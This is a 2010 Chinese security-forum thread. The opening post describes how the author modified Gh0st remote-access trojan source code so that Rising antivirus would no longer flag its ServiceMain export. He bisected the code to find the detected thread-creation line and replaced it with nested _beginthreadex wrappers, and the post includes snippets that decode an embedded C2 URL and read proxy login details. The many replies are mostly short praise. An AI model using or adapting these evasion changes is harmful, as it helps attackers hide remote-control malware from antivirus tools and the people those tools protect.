首页
社区
课程
招聘
[旧帖] [原创]瑞星ServiceMain免杀所想 0.00雪花
发表于: 2010-6-17 13:56 5334

[旧帖] [原创]瑞星ServiceMain免杀所想 0.00雪花

2010-6-17 13:56
5334

申请邀请码 文章二
   
     最近几天做Gh0st免杀,在做到瑞星免杀时,碰到一个有些棘手的问题,输出表中ServiceMain总是被杀,新增输出函数还是移动位置都会被杀。本人前几天还上看雪咨询了一下,见帖 http://bbs.pediy.com/showthread.php?t=114979
     由于是做源代码免杀,而且要对gh0st做很多改动,加上本人非常讨厌非驱动类程序里面夹杂asm代码,所以实在不想用什么函数名加密法。于是只能硬着头皮研究一下瑞星查杀的特点。

    首先找出几个系统自带的由svchost启动的服务dll,分析其ServiceMain入口,对比gh0st的情况,发现没什么两样,然后用瑞星查杀一下,没报为病毒。这情况说明瑞星杀ServiceMain还有别的条件在里面,那别的条件是什么呢?于是我再次打开gh0st工程,找到ServiceMain函数入口,怎么分析呢,还是一段一段代码检查吧!

    第1步将该函数所有实现代码全注释掉,编译用瑞星查杀,发现瑞星没报病毒,看来分析思路是对的。
    第2步从上到下每次开启一部分代码进行编译,然后用瑞星查杀,最后发现下面这行代码开启的时候,瑞星肯定会报病毒
   

 HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
    HANDLE xxyy ()
    {
    	HANDLE	hThread = INVALID_HANDLE_VALUE;

	_beginthreadex(NULL, 
		0, 
		MS_ThreadLoader, 
		&hThread,
		0, 
		NULL
		);
    }

    unsigned int __stdcall MS_ThreadLoader(LPVOID param)
    {
	HANDLE* pHThread = (HANDLE*)param;
	*pHThread = (HANDLE)_beginthreadex(NULL, 
		0, 
		XX_ThreadLoader, 
		param,
		0, 
		NULL
		);

	return 0;
    }

    unsigned int __stdcall XX_ThreadLoader(LPVOID param)
    {
	unsigned int	nRet = 0;
#ifdef _DLL
	try
	{
#endif	
        main(param);
#ifdef _DLL
	}catch(...){};
#endif
	return nRet;
     }
SetUnhandledExceptionFilter(bad_exception);
if (!getLoginInfo(MyDecode(lpURL + 6), &lpszHost, &dwPort, &lpszProxyHost, 
				&dwProxyPort, &lpszProxyUser, &lpszProxyPass))

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 7
支持
分享
最新回复 (38)
雪    币: 65
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
传说中的沙发都没有人上??
2010-6-21 19:34
0
雪    币: 61
活跃值: (51)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
呵呵

好久都没有弄这个了
忘完了
2010-6-21 21:13
0
雪    币: 103
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
飞过路过学习过了
2010-6-29 00:50
0
雪    币: 114
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
kan看不懂,kan看不懂,
2010-7-3 13:48
0
雪    币: 212
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
LZ很强的分析能力
2010-7-3 17:49
0
雪    币: 45
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
不得不承认,楼主很强,这样的文章都加精了,但没人看,是发错地方了,这新手比较多,都看不懂啊,可惜了
2010-7-4 10:58
0
雪    币: 2477
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
每一个原创帖子都要顶一下
2010-7-23 14:58
0
雪    币: 61
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
遇到好贴咱就顶!
2010-7-23 15:55
0
雪    币: 7
活跃值: (333)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
10
看来你在做免杀这方面还不错
2010-7-23 17:16
0
雪    币: 68
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
分析不错 基本能看懂 以后闲来没事得多来坛里学习学习~
2010-7-23 18:19
0
雪    币: 1160
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
原创帖子都要顶一下,崔然看不懂
2010-9-1 08:17
0
雪    币: 222
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
谢谢分享。。。。
2010-9-1 09:55
0
雪    币: 323
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
虽然看不懂,也要顶一下
2010-9-1 11:14
0
雪    币: 317
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
好深奥,新手看不太懂
2010-9-1 11:56
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
好帖啊,可惜我看不懂,只好帮顶!
2010-9-1 15:09
0
雪    币: 243
活跃值: (247)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
17
必须支持  一下
2010-9-1 23:41
0
雪    币: 1160
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
遇到好贴咱就顶
2010-9-4 08:54
0
雪    币: 262
活跃值: (27)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
不错的源码免杀思路,支持一个!
2010-11-30 19:13
0
雪    币: 127
活跃值: (40)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
20
谢谢!
好长时间没上看雪了,都找不回那段时间的激情了。
2010-12-15 23:31
0
雪    币: 247
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
飞过路过学习过了
2010-12-16 10:12
0
雪    币: 322
活跃值: (113)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
留个脚印,有时间在慢慢看
2010-12-16 10:20
0
雪    币: 10
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
看不懂的新人表示很有压力
2010-12-16 11:05
0
雪    币: 87
活跃值: (25)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
24
不错,不错,来支持一个
瑞星还是很不错的说
2010-12-16 12:36
0
雪    币: 8
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
25
学习了
2010-12-16 12:55
0
游客
登录 | 注册 方可回帖
返回
//